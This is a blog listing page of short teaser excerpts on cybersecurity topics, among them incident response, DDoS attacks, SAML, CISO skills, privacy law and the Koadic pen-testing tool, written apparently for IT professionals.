For IT Pros Only

Lets be clear: this is for IT people. Not because IT people are better looking and drive cooler cars than the general populace (which is true: most IT departments look like extras from the set of The Fast and Furious), but because unless you're familiar with things like the dark blackness that grips your soul when you discover that two NICs have the same MAC address on your network - you probably aren't going to appreciate this at all.

Get Your Cards Now
Data Security
Incident Response 6-Step Plan

What is Incident Response? A 6-Step Plan

“We don’t rise to the level of our expectations, we fall to the level of our training.” – Archilochus Incident Response is the art of cleanup and recovery when you discover a cybersecurity breach. You might also see these breaches referred to as IT incidents, security incidents, or computer incidents – but whatever you call them, you need a plan and a team dedicated to managing the incident and minimizing the damage and cost of…
Data Security
DDoS Attack

What is a Distributed Denial of Service (DDoS) Attack?

A Distributed Denial of Service (DDoS) attack is an attempt to crush a web server or online system by overwhelming it with data. DDoS attacks can be simple mischief, revenge, or hactivism, and can range from a minor annoyance to long-term downtime resulting in loss of business. Hackers hit GitHub with a DDoS attack of 1.35 terrabytes of data per second in February of 2018. That’s a massive attack, and it’s doubtful that it will…
Data Security
Coworkers bumping their fists

The Top Skills of Fortune 100 CISOs

The role of CISO is constantly expanding and evolving with the growing awareness of cyber attacks. As cyber attacks increase in density and sophistication, organizations are beginning to look at security as a business priority and the role of CISO has become more critical. Companies need to look beyond basic technical expertise and the necessary leadership skills and instead look for someone who can also understand their organization’s operations and can express IT security priorities…
Data Security

What is the Colorado Privacy Law?

On September 1, 2018, the Colorado Protections for Consumer Data Privacy law, HB 18-1128, goes into effect. A bi-partisan group introduced HB 18-1128 in January, and after the usual negotiations, the Legislature passed it unanimously. The new Privacy Law provisions are part of the Colorado Consumer Protection Act (“CCPA”), in a continued effort to protect personal data. Colorado is getting the message. Data privacy and security are important – and companies need to be held…
Data Security

Do Executives and Cybersecurity Pros Agree on Today’s Biggest Cyber Threa...

Breaches cost companies billions, erode trust and can have a long-lasting negative impact on a company’s brand. With so much as stake, we wondered: are C-Suite executives aligned with their security and IT pros when it comes to cybersecurity? We asked 345 C-Suite executives and cybersecurity/IT pros in the U.S., U.K., France and Germany some questions to find out. Dreading Data Loss: What are Executives’ Top 3 Cybersecurity Concerns? Corporate executives share the same concerns…
Data Security
translate cybersecurity jargon

How to Turn Cybersecurity Jargon into a Language Everyone in Your Office Ca...

Explaining how cybersecurity affects an entire organization can be complex. The field is filled with jargon and buzzwords that can hinder understanding for those outside of IT. What’s more, everyone in an organization views cybersecurity through a different lens, depending on what their role in the company is. In order to explain important aspects of cybersecurity and how they affect your company, you must be able to communicate without using jargon that business stakeholders may…
IT Pros
what is SAML?

What is SAML and How Does it Work?

Security Assertion Markup Language (SAML) is an open standard that allows identity providers (IdP) to pass authorization credentials to service providers (SP). What that jargon means is that you can use one set of credentials to log into many different websites. It’s much simpler to manage one login per user than it is to manage separate logins to email, customer relationship management (CRM) software, Active Directory, etc. SAML transactions use Extensible Markup Language (XML) for…
Data Security

Data Security: Definition, Explanation and Guide

What is Data Security? Data Security is a process of protecting files, databases, and accounts on a network by adopting a set of controls, applications, and techniques that identify the relative importance of different datasets, their sensitivity, regulatory compliance requirements and then applying appropriate protections to secure those resources. Similar to other approaches like perimeter security, file security or user behavioral security, data security is not the be all, end all for a security practice.…
IT Pros

Koadic: Pen Testing, Pivoting, & JavaScripting, Part II

Mshta and rundll32, the Windows binaries that Koadic leverages, have been long known to hackers. If you take a peek at Mitre’s ATT&CK database, you’ll see that rundll32 has been the basis for attacks stretching over years. Pen-testing tools, such as Koadic, have formalized established hacking wisdom, thereby helping IT people (and bloggers) to understand threats and improve defenses. I’ll add that it makes sense to also take a deeper dive into Koadic’s design to…
Data Security

5 Cybersecurity Concerns of Industry Insiders

We asked professionals attending two of the world’s biggest cybersecurity conferences – RSA in San Francisco and Infosecurity in London – five questions to gauge their opinions and attitudes about current issues and concerns on everything from GDPR and the Facebook data scandal to cloud security. Read on to discover what we found after surveying folks who live and breathe security every day. Question 1: Should the U.S. and/or individual states standardize data privacy laws…
IT Pros
women studying in front of two computer screens

CISM vs. CISSP Certification: Which One is Best for You?

It’s a perfect time to be CISM or CISSP certified, or have any cybersecurity certification: according to Gartner, the unemployment rate for cybersecurity professionals is zero – as in there isn’t an unemployment rate. In fact, there are more jobs than qualified candidates, and the job postings stay open for a long time. CISM and CISSP are two of the most highly regarded certifications for cybersecurity leaders and practitioners, but their requirements aren’t trivial. Both…
IT Pros

Koadic: LoL Malware Meets Python-Based Command and Control (C2) Server, Par...

In my epic series on Windows binaries that have dual uses– talkin’ to you rundll32 and mshta — I showed how hackers can stealthy download and launch remote script-based malware. I also mentioned that pen testers have been actively exploring the living-off-the land (LoL) approach for post-exploitation. Enter Koadic. I learned about Koadic sort of by accident. For kicks, I decided to assemble a keyword combination of “javascript rundll32 exploitation” to see what would show…